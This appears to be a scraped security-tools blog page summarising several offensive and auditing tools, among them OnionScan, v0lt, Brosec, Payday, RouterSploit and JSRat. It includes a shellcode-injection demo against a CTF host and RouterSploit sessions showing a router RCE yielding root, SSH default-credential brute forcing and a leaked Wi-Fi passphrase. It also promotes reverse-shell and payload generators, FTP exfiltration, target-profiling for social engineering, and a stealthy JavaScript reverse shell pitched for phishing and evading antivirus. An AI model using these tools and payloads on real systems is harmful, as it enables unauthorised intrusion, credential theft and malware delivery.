Onion Services Security Scan - OnionScan

The purpose of this tool is to make you a better onion service provider. You owe it to yourself and your users to ensure that attackers cannot easily exploit and deanonymize.

Go Dependencies

• h12.me/socks - For the Tor SOCKS Proxy connection.
• github.com/xiam/exif - For EXIF data extraction.
• github.com/mvdan/xurls - For some URL parsing.

OS Package Dependencies

• libexif-dev on Debian based OS
• libexif-devel on Fedora

Installing

Install OS dependencies

• On Debian based operating systems:

       sudo apt-get install libexif-dev    

• On Fedora based operating systems:

       sudo dnf install libexif-devel    

Grab with go get

    go get github.com/s-rah/onionscan   

Compile/Run from git cloned source

    go install github.com/s-rah/onionscan   

and then run the program in

    ./bin/onionscan   

.
Or, you can just do

    go run github.com/s-rah/onionscan.go   

to execute without compiling.

Running

For a simple report detailing the high, medium and low risk areas found:

    ./bin/onionscan blahblahblah.onion   

The most interesting output comes from the verbose option:

    ./bin/onionscan --verbose blahblahblah.onion   

There is also a JSON output, if you want to integrate with something else:

    ./bin/onionscan --jsonReport blahblahblah.onion   

If you would like to use a proxy server listening on something other that

    127.0.0.1:9050   

, then you can use the --torProxyAddress flag:

    ./bin/onionscan --torProxyAddress=127.0.0.1:9150 blahblahblah.onion   

Apache mod_status Protection

This should not be news , you should not have it enabled. If you do have it enabled, attacks can:

• Build a better fingerprint of your server, including php and other software versions.
• Determine client IP addresses if you are co-hosting a clearnet site.
• Determine your IP address if your setup allows.
• Determine other sites you are co-hosting.
• Determine how active your site it.
• Find secret or hidden areas of your site
• and much, much more.

Seriously, don't even run the tool, go to your site and check if you have /server-status reachable. If you do, turn it off!

Open Directories

Basic web security 101, if you leave directories open then people are going to scan them, and find interesting things - old versions of images, temp files etc.
Many sites use common structures style/ , images/ etc. The tool checks for common variations, and allows the user to submit others for testing.

EXIF Tags

Whether you create them yourself or allow users to upload images, you need to ensure the metadata associated with the image is stripped.
Many, many websites still do not properly sanitise image data, leaving themselves or their users at risk of deanonymization.

Server Fingerprint

Sometimes, even without mod_status we can determine if two sites are hosted on the sam infrastructure. We can use the following attributes to make this distinction:

• Server HTTP Header
• Technology Stack (e.g. php, jquery version etc.)
• Website folder layout e.g. do you use /style or /css or do you use wordpress.
• Fingerprints of images
• GPG Versions being used.

Download Onionscan

Read More

Wireless Network Auditing Tool - FruityWifi v2.4

FruityWifi is a wireless network auditing tool. The application can be installed in any Debian based system adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq.

v2.4

• Utils have been added (replaces "ifconfig -a")
• Kali Linux Rolling compatibility issue has been fixed

v2.3

• monitor mode (mon0) has been fixed (new airmon-ng compatibility issue)

v2.2

• Wireless service has been replaced by AP module
• Mobile support has been added
• Bootstrap support has been added
• Token auth has been added
• minor fix

v2.1

• Hostapd Mana support has been added
• Phishing service has been replaced by phishing module
• Karma service has been replaced by karma module
• Sudo has been implemented (replacement for danger)
• Logs path can be changed
• Squid dependencies have been removed from FruityWifi installer
• Phishing dependencies have been removed from FruityWifi installer
• New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
• Domain name can be changed from config panel
• New install options have been added to install-FruityWifi.sh
• Install/Remove have been updated

v2.0 (alpha)

• Web-Interface has been changed (new look and feel, new options).
• Nginx has replaced Apache2 as default webserver.
• Installation script has been updated.
• Config panel has been changed.
• Network interfaces structure has been changed and renamed.
• It is possible to use FruityWifi combining multiple networks and setups.
• Supplicant mode has been added as a module.
• 3G/4G Broadband Mobile has been added as a module.
• FruityWifi HTTP webinterface on port 8000
• FruityWifi HTTPS webinterface on port 8443

v1.9

• Service Karma has been replaced by Karma module
• Service Supplicant has been replaced by nmcli module
• Config page has been updated
• Supplicant config has been changed (nmcli module is required)
• dnspoof host file has been removed from config page (dnsspoof module is required)
• Logs page has been updated
• WSDL has been updated
• Hostapd/Karma has been removed from installer (replaced by Karma module)
• NetworkManager has been removed from installer (replaced by nmcli module)
• install-modules.py has been added (install all modules from console)

v1.8

• WSDL has been added
• new status page has been added
• logs can follow in realtime using the new status page (wsdl)

v1.6

• Dependencies can be installed from module windows
• minor fix

v1.5

• New functions has been added
• Source code has been changed (open file function)
• minor fix

v1.4

• New functions has been added (monitor mode)
• config page has been changed
• minor fix

v1.3

• Directory structure has been changed
• minor fix

v1.2

• Installation script has been updated
• SSLstrip fork (@xtr4nge) has been added (Inject + Tamperer options)
• minor fix

v1.1

• External modules can be installed from modules page
• minor fix

v1.0

• init

Download FruityWifi

Read More

Security CTF Toy Tools - v0lt

v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:

• Libmagic
• Python3
  • BeautifulSoup
  • Requests
  • filemagic
  • hexdump
  • passlib

Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:

• Crypto
  
  • Base64
  • Ceasar shift
  • Hashing functions (SHA, MD5)
  • Bits manipulations (XOR, inverse XOR)
  • Usual conversions (bytes, strings, hex)
  • RSA basics (inverse modulo, inverse power, egcd...)
  • Bruteforcing (Dictionnary, custom word)
• Shellcodes
  
  • Shellcode selection and download from Shell-storm repo
  • Shellcode formater
  • Shell{cat,net}: Sending shellcode made easy
  • Automatic padding
• Easy connection support
  
  • Netcat
  • Telnet

And more Examples are available here

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3

• Lots of fixes again
• Hexeditor (Dump/Rewrite files)
• Unix password bruteforce cracker

1.2

• Lots of documentation/bugs/framework fixes
• Added bruteforce
• Added linux utils
• Began hexeditor
• Shellhack fixes
• Alert messages

1.0

• Lots of documentation fixes
• Lots of bugfixes
• Added shellhack (shellcodes stuff)
• Added crypto utils
• Added network utils
• Fixed project tree

Download V0Lt

Read More

Multi-Architecture GDB Enhanced Features for Exploiters & Reverse-Engineers - GEF

GEF is aimed to be used mostly by exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis or exploit development.

GEF fully relies on GDB API and other Linux specific source of information (such as /proc/pid ). As a consequence, some of the features might not work on custom or harden systems such as GrSec. It has fully support for Python2 and Python3 indifferently (as more and more distro start pushing gdb compiled with Python3 support).

Quick start

Simply make sure you're having a GDB 7.x+ .

 $ wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh

Then just start playing (for local files):

$ gdb -q /path/to/my/bin
gef> gef help

Or (for remote debugging)

remote:~ $ gdbserver 0.0.0.0:1234 /path/to/file 

And

local:~ $ gdb -q
gef> gef-remote your.ip.address:1234

Show me

x86

ARM

PowerPC

MIPS

Dependencies

There are none: GEF works out of the box! However, to enjoy all the coolest features, it is recommended to install:

• capstone highly recommended
• ROPgadget highly recommended

Note : if you are using GDB with Python3 support, you cannot use ROPgadget as Python3 support has not implemented yet. Capstone and radare2-python will work just fine.
Another note : Capstone is packaged for Python 2 and 3 with pip . So a quick install is

$ pip2 install capstone    # for Python2.x
$ pip3 install capstone    # for Python3.x

And same goes for ropgadget



$ pip[23] install ropgadget

The assemble command relies on the binary rasm2 provided by radare2 .

Download GEF

Read More

Script to collect information to the client side - GetDataReport

Script in PHP+JS for get information of target through a web application, use $_SERVER functions and JS functions for get information of our client.

Plugin (WEBApps)

in some web applications need to collect information from the client to perform tasks with this plugin will be easier to work with the variables you need.

<?php

include("GetdataReport.Plugin.php");
$data = new GetDataPlugin();

echo "<br>IP               ".$data->ip();
echo "<br>Operative System ".$data->os();
echo "<br>Browser          ".$data->browser();
echo "<br>Screen height    ".$data->height();
echo "<br>Screen width     ".$data->width();
echo "<br>Java enabled     ".$data->javaenabled();
echo "<br>Cookie enabled   ".$data->cookieenabled();
echo "<br>Language         ".$data->language();
echo "<br>Architecture     ".$data->architecture();
echo "<br>Device           ".$data->device();
echo "<br>Country          ".$data->geo('country');
echo "<br>Region           ".$data->geo('region');
echo "<br>Continent        ".$data->geo('continent');
echo "<br>City             ".$data->geo('city');
echo "<br>Logitude         ".$data->geo('logitude');
echo "<br>Latitude         ".$data->geo('latitude');
echo "<br>Currency         ".$data->geo('currency');
echo "<br>Provetor         ".$data->provetor();
echo "<br>Agent            ".$data->agent();
echo "<br>Referer          ".$data->referer();
echo "<br>Date             ".$data->getdate();


 ?>

Hack (Social engineering)

With this script we can collect information from a target performing a routing and generating an html page report.

        HTTP://127.0.0.1/GetdataReport.php?id=any&j=yes&url=google.com

Download GetDataReport

Read More

An interactive reference tool to help security professionals utilize useful payloads and commands - Brosec

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...

Payload Variables

Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.

For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).

Available variables

• LHOST : Local IP or name
• LPORT : Local IP or name
• RHOST : Remote IP or name
• RPORT : Remote IP or name
• USER : Username (only used in a few payloads)
• PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)

Above are multiple examples of how to access and set the stored configuration variables.

• Configuration variables can be viewed via the config command at any time, or by entering the variable name
• Variables can be changed at any time by entering set <variable> <value>
• You can also navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
  • Ex: bros 413 - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Additional Features and Usage Examples

XXE for Bros

In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.

Simple HTTP(s) Server

Need a quick web server? Forget python SimpleHTTPServer, bros has your back with bros http when entered via the command line. An SSL server? bros https has you covered.

Anonymous FTP Server

Need to exfiltrate some data via ftp? Bros comes with a handy bros ftp when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).

Installation

Releases
Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec

Manual installation

Mac

• brew install node netcat - Install Nodejs and netcat (nc or ncat will work too)
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
• cd Brosec && npm install - cd into the directory and install npm depdendencies

Kali Linux

• apt-get install npm build-essential g++ xsel netcat Install dependencies
• npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
• npm install -g n Install n (nodejs version manager)
• n latest Install latest version of nodejs
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
• cd Brosec && npm install - cd into the directory and install npm depdendencies

Windows (Unsupported)

• Install nodejs
• Install ncat
• git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo

Payloads that utilize netcat will not work due to the kexec library not being supported in Windows

Optional

Add bros directory path to your PATH env variable, create a symlink for the bros file, etc

Configuration

Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).

Download Brosec

Read More

Payload generator that uses Metasploit and Veil - Payday

Payload generator that uses Metasploit and Veil. Takes IP address input and then builds payloads automatically. Calls Veil framework with supplied IP address and creates binaries and handlers. Uses msfvenom to create payloads and writes resource handler files in the same way that Veil does.

Examples:

Generate Metasploit Payloads

payday.py --msf --ip 1.1.1.1

Generate Veil Payloads

payday.py --veil --ip 1.1.1.1

Generate Both

payday.py --veil --msf --ip 1.1.1.1

Clean Out Directories

payday.py --clean

Specify custom output directory

payday --veil --msf --output /path/to/custom --ip 1.1.1.1

Clean custom output directory

payday --output /path/to/custom --clean

Download Payday

Read More

Router Exploitation Framework - RouterSploit

The RouteSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aids penetration testing operations:

• exploits - modules that take advantage of identified vulnerabilities
• creds - modules designed to test credentials against network services
• scanners - modules that check if target is vulnerable to any exploit

Installation

sudo apt-get install python-requests python-paramiko python-netsnmp
git clone https://github.com/reverse-shell/routersploit
./rsf.py

Usage

root@kalidev:~/git/routersploit# ./rsf.py 
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Wildest Dreams
 Version  : 1.0.0

rsf > 

1. Exploits

Pick the module

rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) > 

U can use tab key for completion.

Options

Display module options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target Port

Set options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module

Exploiting target can be achieved by issuing 'run' or 'exploit' command:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root

It is also possible to check if the target is vulnerable to particular exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Info

Display information about exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

2. Creds

Pick module

Modules located under creds/ directory allow running dictionary attacks against various network services.
Following services are currently supported:

• ftp
• ssh
• telnet
• http basic auth
• http form auth
• snmp

Every service has been divided into two modules:

• default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
  
• bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).

Console:

rsf > use creds/
creds/ftp_bruteforce         creds/http_basic_bruteforce  creds/http_form_bruteforce   creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default         
creds/ftp_default            creds/http_basic_default     creds/http_form_default      creds/ssh_bruteforce         creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) > 

Options

rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           


Module options:

   Name         Current settings                                                      Description                                              
   ----         ----------------                                                      -----------                                              
   threads      8                                                                     Numbers of threads                                       
   defaults     file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)

Set target:

rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

Run module

rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) > 

3. Scanners

Scanners allow quickly verify if the target is vulnerable to any exploits.

Pick module

rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                

Set target:

rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

Run module

rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure

It has been verified that target is vulnerable to dwr_932_info_disclosure exploit. Now use proper module and exploit target.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

   Parameter                  Value                                                                                                 
   ---------                  -----                                                                                                 
   get_wps_enable             0                                                                                                     
   wifi_AP1_enable            1                                                                                                     
   get_client_list            9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0     
   wifi_AP1_ssid              dlink-DWR-932                                                                                         
   get_mac_address            c4:00:f5:00:ec:40                                                                                     
   wifi_AP1_security_mode     3208,8                                                                                                
   wifi_AP1_hidden            0                                                                                                     
   get_mac_filter_switch      0                                                                                                     
   wifi_AP1_passphrase        MyPaSsPhRaSe                                                                                          
   get_wps_mode               0

Download RouterSploit

Read More

Reverse HTTP Shell Using JavaScript - JSRat

JSRat is a reverse HTTP Shell by using JavaScript. JSRat use rundll32.exe to load the JavaScript code in cmd and a HTTP Shell is returned when the code is executed. The special part is that after running the cmd command, rundll32.exe will remain in the background to continuously connect to the Server. No file is written to the disk during the whole process, which significantly enhances stealth.

Characteristics:

To reverse a shell by using cmd to execute codes

Advantages:

• It can avoid being killed
• It’s easy to use
• It’s relatively stealthy.

Exploitation:

Based its characteristics and advantages, using JavaScript as the phishing payload can achieve amazing effect.

Download JSRat

Read More